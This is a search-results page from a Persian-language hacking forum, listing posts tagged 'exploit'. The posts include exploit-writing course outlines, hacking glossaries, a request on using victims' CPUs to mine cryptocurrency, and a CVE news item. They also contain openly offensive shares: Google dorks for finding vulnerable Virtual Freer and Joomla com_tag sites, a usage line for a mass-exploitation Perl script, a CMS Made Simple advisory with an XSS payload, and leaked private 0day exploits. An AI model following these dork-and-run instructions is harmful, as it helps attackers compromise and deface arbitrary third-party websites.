رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'اکسپلویت'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

15 نتیجه پیدا شد

  1. ▀▄▀▄▀▄ بسم الله الرحمن الرحیم ▄▀▄▀▄▀ در این دوره آموزشی شما را به صورت مقدماتی تا پیشرفته با بحث اکسپلویت نویسی آشنا تا شما کاربران محترم انجمن گاردایران به راحتی بتوانید اکسپلویت های خود را بعد از این آموزش در سایت های مختلف ثبت اکسپلویت ثبت کنید.این دوره شامل کار با دورک، معرفی سایت‌های ثبت اکسپلویت معتبر، توضیح در مورد قسمت‌های مختلف یک اکسپلویت استاندارد و شرایط ثبت آن در سایت‌های مختلف، و همچنین ثبت کردن اکسپلویت به صورت کاملا پروژه محور میباشد در این دوره یکی از روش‌های پیدا کردن اکسپلویت از طریق حفره امنیتی SQL Injection به صورت کامل گفته خواهد شد توضیح کوتاهی در مورد اکسپلویت برای درک بهتر شما عزیزان اکسپلویت چیست؟ اکسپلویت کدی برای سوء استفاده از حفره‌های امنیتی که برای مثال میتوان : برنامه‌های کاربردی، سیستم عامل، هسته سیستم عامل، وب سرور و به صورت کلی هر نرم‌افزاری که در یک شبکه و یا رایانه کار می‌کند , اکسپلویت گفته میشود و همچنین اکسپلویت را می‌توان با زبان‌های مختلف برنامه‌نویسی نوشت که متخصصان امنیتی برای اثبات آسیب‌پذیری‌های مختلف اقدام به نوشتن اکسپلویت میکنند.اکسپلویت نویسی بسیار برای امر بچ کردن باگ های مختلف مفید است فصل اول | مقدمه و آشنایی مقدمه دوره معرفی ابزارهای مورد نیاز آشنایی با اصطلاحات و دورک نویسی فصل دوم | اموزش کشف باگ و اکسپلویت نویسی در php نحوه نوشتن استاندارد یک اکسپلویت کشف حفره امنیتی SQL Injection کشف حفره امنیتی Remote File Upload کشف حفره امنیتی Cross Site Scripting کشف حفره امنیتی Remote/Local File Inclusion کشف حفره امنیتی Local File Disclosure کشف حفره امنیتی Remote Command Execution توجه : لطفا در تاپیک اسپم کنید آموزش ها به صورت تصویری همراه با صدا میباشد
  2. proxy

    معرفی سایتهای ثبت اکسپلویت

    حتما برای شما هم پیش اومده که بخواین برای یک نرم افزار اکسپلویت پیدا کنید در زیر لیستی از سایتهای مخصوص ثبت اکسپلویت رو میبینید که مهم ترین اونا exploit-db هست که خیلی هم معتبره امیدوارم به کارتون بیاد [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]
  3. × حفره امنیتی و یا همان باگ چیست ؟ » به نقص ها و سهل انگاری های برنامه نویسان، طراحان وب سایت ها، در کارهای خود به جای میگذارند، نفوذگر آنها را پیدا کرده و از طریق این حفره ها اقدام به نفوذ میکند را باگ می گویند ! × تارگت چیست ؟ » معنی اصلی این کلمه یعنی هدفی که از قبل تعیین شده، به طور مثال نفوذگر پس از جمع آوری کامل اطلاعات از یک وب سایت فهمیده است که این وب سایت حفره امنیتی دارد و میتواند از طریق این حفره ها و باگ ها اقدام به نفوذ کند و آن را هدف و یا تارگت خود قرار میدهد ! × اکسپلویت چیست ؟ » به یکسری کد های مخرب که توسط مهاجم و یا همان نفوذگر نوشته میشود را اکسپلویت می نامند. × پیلود چیست ؟ » به یکسری کد های مخرب وظیفه انتقال پکتهای ارتباطی بین دو کامپیوتر یا چندبن کامپیوتر به صورت غیر مجاز را دارند پیلود میگویند. × کیلاگر چیست ؟ » نرم افرار و یا برنامه ای برای دسترسی به تمامی کلمات و یا حروفی که بر روی صفحه کلید تارگت تایپ میشود را ذخیره و برای نفوذگر ارسال میشود،این کلمات میتوان از انواع آدرس ها مانند حساب های بانکی، پسورد ها و را در نظر گرفت ! × بایپس چیست ؟ » به معنای دور زدن هست یعنی هکر با روش های خاصی موانع امنیتی را دور میزند ! × کلاینت چیست ؟ » سیستم های که از یک سرور خدمات دریافت میکنند را کلاینت های می نامند، برای مثال شما یک کلاینت هستید ! × شل چیست ؟ » در هک هنگامی که هکر با استفاده از ابزارها و کارهای خود میتونه به سیستم قربانی نفوذ کنه و کنترل سیستم رو بدست بگیره اصطلاحا میگن شل گرفته و میتونه تصمیمات خودش رو عملی کنه ! × دیفیس چیست ؟ » وقتی یه هکر سایتی رو هک میکنه ، نمای صفحه اصلی (یا بقیه صفحه های) سایت رو تغییر میده و ممکنه اسم خودش رو هم درج کنه و مسئولیت هک سایت رو بپذیره به این صفحه دیفیس پیج میگویند ! × مس دیفیس چیست ؟ » مس دیفیس هم مثل همون دیفیس هست با این فرق که شما وقتی تمام سایت های متعلق به یک سرور خاص رو دیفیس کنید میگویند مس دیفیس انجام داده اید ! × بک دور چیست ؟ » در هک وقتی یه هکر به سیستمی نفوذ کرد عمدا راه دومی برای نفوذهای بعدی در سیستم هک شده قرار میده تا اگه یوقت احیانا راه نفوذ فعلی شناسایی و بسته شد بتونه با کمک در پشتی که ایجاد کرده دوباره نفوذ کنه ! هماهنگ شده با ادمین عزیز @proxy
  4. سلام من مطلبی دیدم تحت عنوان ماین کردن ارزدیجیتال مثل اتریوم با استفاده از سی پی یو قربانی!!! بعد از نفوذ به سیستم اش, ولی اموزشش رو توی اینترنت پیدا نکردم البته یه اموزش مختصری بود در باره اسیب پذیری محصولات mikrotik و با این اسیب پذیری دسترسی میگرفت و ماین میکرد برای کامپیوتر ها(pc) هم میشه این کارو کرد؟ یعنی بعد از نفوذ با cpu اون ماین کرد اگه میشه اموزشش رو قرار بدید چون روی اینترنت من پیدا نکردم ممنون
  5. Sadra

    Guardiran Explpot Database

    با سلام خدمت دوستان عزیز شاید قبلا Guardiran Exploit Database رو جز خدمات Mr.MSA دیده باشید: اما از الان به بعد برای این پروژه یک دامین جدید گرفتم و به پروژه جدا تبدیل شد: exploit-db.ga نکات مهم درمورد این سیستم: ۱- این سیستم کلا از خدمات MR.MSA جدا میشه ولی از طرفی یکی از خدمات و پروژه های من هست! ۲- دامین تا یک سال تمدیده. ۳- پروژه که php بود رو html کردم. ۴- سورس در گیتهاب موجود میباشد. ۵- اکسپلویت های بخش vip انجمن قرار داره. لینک گیت هاب موفق و پایدار باشید.
  6. echzed

    باگ Virtual Freer

    خب سلامی دوباره ECHZED هستم DANTE سابق این اکسپلویت رو دوست خوبم بیسکوییت پدر ثبت کردخ و حالا میخوایم دربارش بحث کنیم این اکسپلویت برای Virtual Freer هست و میتونید با دورک intext: Virtual Freer یا intext:power by Virtual Freer استفاده کنیدش شما سایت را با این دورک ها پیدا کنید و سپس با فایل پایتونی که پیوست میکنم میتونین از اون دسترسی بگیرید و دستورات خودتون رو وارد کنید باید ذکر کنم فایل پایتون 2 هستش و شما میتونین با تغییر دادن print ها و input ها به حالت پایتون 3 درش بیارید (برنامه نویسی پایتون بلد باشید میفهمید منظورم چیه) لینک اکسپلویت: [Hidden Content] vfrce.py
  7. یک محقق امنیت سایبری جزیات فنی و اکسپلویت یک اسیب پذیری بحرانی RCE را که دستگاه های OpenWrt را الوده کرده است گذارش داد که عبارت از یک سیستم عامل شناخته شده لینوکس برای دستگاه های روتر یا مسیریاب ها است و همچنان شامل دیگر دستگاه های تعبیه شده ای می باشد که ترافیک شبکه را مسیریابی می کند. با شناسه CVE-2020-7982 شناخته می شود و اسیب پذیری در OPKG package manager of OpenWrt موجود است که بررسی یکپارچگی پکیج های دانلود شده را با SHA-256 checksums انجام می دهد. و اگر به صورت موفقانه اکسپلویت شود دسترسی کامل دستگاه را به صورت ریموت به هکر می دهد و همچنان کنترل کامل تمام ترافیک که از روی آن دستگاه می گذرد
  8. سلام خدمت اعضا محترم گارد ایران. خوب در این پست بنده قصد دارم که اکسپلویت نویسی رو به شما عزیزان آموزش بدم. بعضی از دوستان میپرسیدن که چطوری اکسپلویت ثبت میکنی و باگ پیدا میکنی و.. به همین خاطر تصمیم به ساخت این مجموعه گرفتم. خوب من از جناب گوگل برای ثبت اکسپلویت استفاده میکنم ولی اگر استقابال بشه از ابزارهای لینوکس هم میزارم. اهداف بنده از ایجاد این تاپیک: 1-کمک به افزایش سطح علمی عزیزان گارد ایران. 2-بالابردن تیم در بین تیم ها ثبت اکسپلویت 3-افزایش روز به روز تعداد اکسپلویتر و دیفیسر های تیم. اموزش پیدا کردن باگ هایxss,lfi,sql,shell upload,..در cms های مختلف==>اکسپلویت کردن==>ریپورت دادن=ثبت شدن باگ خوب دوستان گفته باشم استقبال نشه تاپیک دیر به دیر آپدیت میشه. به امید روزی که نام تک تک شما عزیزان رو در بخش ثبت اکسپلویت ببینیم.
  9. به نام خدا با عرض سلام. بعد از یک مدت نسبتا طولانی با یک دوره آموزشی مفید در زمینه تست نفود و امنیت در خدمت شما هستیم. قبلا ما دوره ای رو با نام اکسپلویت نویسی داشتیم و در این دوره ما آسیب پذیری های مختلف رو با استفاده از زبان پرل اکسپلویت میکنیم. پیش نیار دوره زبان برنامه نویسی پرل است که ما در این دوره سعی میکنیم توضیحاتی مخنصر رو راجع به قطعه کد ها هم بدیم تا تمام عزیزان بتونن استفاده کنند. سرفصل ها: 1-توضیحات ابتدایی و آشنایی با دوره 2-آشنایی مختصر با آسیب پذیری ها(قبلا دوره ای رو داشتیم برای کشف آسیب پذیری ها . لینک) 3-آشنایی با ماژول های پرکاربرد در اکسپلویت نویسی با پرل 4-آشنایی با دستورات پرکاربرد در این دوره 5-شروع و نوشتن اولین اکسپلویت به زبان پرل 6-آموزش کار با فایل ها و دایرکتوری ها 7-آموزش کار با متد POST و GET برای ارسال و دریافت درخواست ها به سرور 8-آموزش کار با پروتکل های مختلف 9-آشنایی با وب سرورها 10-آشنایی با Header ها و تجزیه و تجلیل آنها 11-تجزیه و تحلیل وب سرور اسیب پذیر برای نوشتن اکسپلویت 12-آموزش Perl CGI 13-آموزش نوشتن اکسپلویت برای انواع آپلودر ها 14-نوشتن اکسپلویت برای انواع CMS ها 15-توضیحات تکمیلی و پایان دوره امیدوارم از این دوره نهایت بهره رو ببرین. با تشکر های خودتون برای ادامه دوره به ما دلگرمی بدین. موفق و پیروز باشید.
  10. proxy

    اصطلاحات هک

    معنی هک: هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه می‌باشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان می‌شود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانه‌ای است؛ و کرک نیز به معنی رمزگشایی است و کراکر (به انگلیسی: Cracker) به فرد گشاینده رمز می‌گویند. باگ چیست؟ باگ نوعی خطا یا اشتباه در اجرای نرم افزار است که موجب نتایج اشتباه یا اجرا نشدن نرم افزار می‌شود. علت این اشکالات می‌تواند اشتباه در هنگام برنامه نویسی باشد. شرکت های سازنده نرم فزارها برای حل این مشکل قبل از ارائه نسخه نهایی نسخه‌هایی تحت نام بتا یا آلفا انتشار می‌دهند تا افرادی آنها را بررسی کنند و این باگ‌ها را گزارش کنند. و هکر میتواند با استفاده از باگ به نرمافزار نفوذ کرده و به هدف خود برسد. شل چیست؟ شل یک ابزار برنامه نویسی شده است که هکر با آپلود کردن اون روی سایت می تواند کارهای مورد نظر خودش رو مانند حذف یا دانلود فایلها و خواندن اطلاعات دیتابیس یا ... رو انجام دهد سی ام اس چیست؟ سی ام اس یا cms سیستم مدیریت محتوا مانند جوملا و وردپرس و..... پورت چیست؟ به راه های ورودی و خروجی اطاعات در سیستم پورت گفته میشه که مانند درهای یک خونه هستند اکسپلویت چیست؟ زمانی که هکر یک باگ رو کشف میکنه برای اینکه بتواند دفعه بعد با سرعت بیشتری نفوذ رو انجام بدهد یک کد مینویسد که عمل نفوذ رو انجام دهد که به آن اکسپلویت گفته می شود. آی پی چیست؟ به آدرس یک سیستم در بستر اینترنت یا شبکه آی پی ip گفته میشود دفیس و مس دفیس چیست؟ زمانی که صفحه سایت مورد نفوذ تغیر پیدا کرد در اصطلاح میگویند که سایت دفیس شده است حال اگر صفحه چند سایت با آی پی های یکسان تغییر پیدا کند میگویند که مس دفیس اتفاق افتاده است بایپس چیست؟ به عبور کردن از موانع بایپس میگویند مانند وقتی به سایتی نفوذ می کنید که safe mode آن فعال هست برای اجرا کردن دستورات خود بر روی شل به مشکل بر می خورید و دلیل آن هم وجود firewall سرور هست . برای اینکه بتوانید دستورات خود را بر روی شل اجرا کنید ولی firewall گیر ندهد باید آن را bypass (دور زدن firewall ) کنید . اگه چیزی رو از قلم انداختم بگید فقط دوستان لطف کنید به چت روم تبدیل نکنید اینجا رو ممنون
  11. سلام. این کتاب توسط تابیس کلین نوشته شده و در مورد تجربیات او در زمینه ی حفره یابی و اکسپلویت نویسی است. فعلا فصل های یک و دو این کتاب ترجمه شده،در صورت ترجمه شدن ،ب قیه فصول در همین تاپیک قرار خواهند گرفت از نرم افزار هایی که ایشون باگ یابی کردن می توان vlc player رو نام برد. رمز: guradiran.org 1.rar
  12. DeMoN

    اکسپلویت های لینوکس(هک سایت)

    ####################################################################### # # Exploit Title: Cms Made Simple multi vulnerability 1.11.10 # Date: 2014 12 June # Author: Dr.3v1l # Vendor Homepage: [Hidden Content] # Version : 1.11.10 # Tested on: Windows # Category: webapps # Google Dork: intext:"powered by CMS Made Simple" # ####################################################################### # # [+] Exploit : # # Cross site scripting (xss) : # # POST input <default_cms_lang> was set to <fa_IR" onmouseover=prompt(3v1l) bad="> # [Hidden Content] # [Hidden Content] # # Host header attack : # # [Hidden Content] # # PoC : cmsmadesimple\admin\themes\NCleanGrey\login.php # # . # . # . # # <p id="img"><?php echo lang('login_info')?>:</p> # <?php echo lang('login_info_params')?> # # // #vulnerability is here # <span>( <?php echo $_SERVER['HTTP_HOST'];?> )</span> # // --end # # </div> # </div> # <div class="login"> # . # . # . # . # # -------------------------- # # /cmsmadesimple/index.php # ####################################################################### # # [+] Contact Me : # # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # IR.linkedin.com/in/hossein3v1l # [Hidden Content] # [Hidden Content] # [Hidden Content] # [Hidden Content] # Hossein Hezami - Black_Devils B0ys # ####################################################################### # B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , Emperor Team # specially of brother Medrik for keep me again researching .. ####################################################################### سلام خدمت دوستان عزیز گارد ایران. خوب در این تاپیک براتون تمامی اکسپلویت های سرور های لینوکس رو قرار میدم و امیدوارم لذت ببرین. یا حق
  13. DeMoN

    مجموعه دورک و اکسپلویت های 2014

    سلام خدمت دوستان عزیز گارد ایرا.خوب اینم از یک مجموعه کامل از ذدورک و اکسپلویت های 2014. پکیج کاملیه و میشه باهاش سایت های زیادی رو زد. pass:guardiran.org یا حق New Folder (2).rar
  14. DeMoN

    اکسپلویت های priv8) 1337 day)

    با سلام خدمت دوستان گل 'گارد ایران. سایت 1337day سایتی هست برای خریدو فروش اکسپلویتها و این تاپیک رو زدم تا اکسپلویت ها رو پاپلیک کنم و رفیقای خودم الکی پول هنگفتی به سایت هایی مثل این ندن و شما هم اگر چیزی داشتید که مربوط میشد و قصد پاپلیکش رو داشتید که به این سایت مربوط میشد در این جا قرار بدید تا پراکنده نشه فقط اسپم نکنید سوالی داشتید پ خ کنید اولیشو میزارم به نام: vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day لینک خریدش که به قیمت 500gold هست : [Hidden Content] Text Document.rar
  15. این اسکریپت همونطور که از اسمش پیداس برای باگ com_tag نوشته شده که می تونید اموزش روش دستیش رو از اینجا ببینید [Hidden Content] خب حالا طرز استفاده از اسکریپت: اول دورک زیر رو سرچ کنید inurl:index.php?option=com_tag حالا چنتا تارگت انتخاب کنید و ادرسشون رو توی یک فایل ذخیره کنید (به همراه http:// و / اخر) مثل زیر /[Hidden Content] حالا برای هک کافیه تو cmd بزنید perl com_tag.pl targets.txt targets.txt همون فایلیه که شما ادرس تارگت هارو توش ذخیره کردید بقیه کار هارو اسکریپت انجام می ده و نتیجه رو براتون می نویسه com_tag.rar
×
×
  • ایجاد مورد جدید...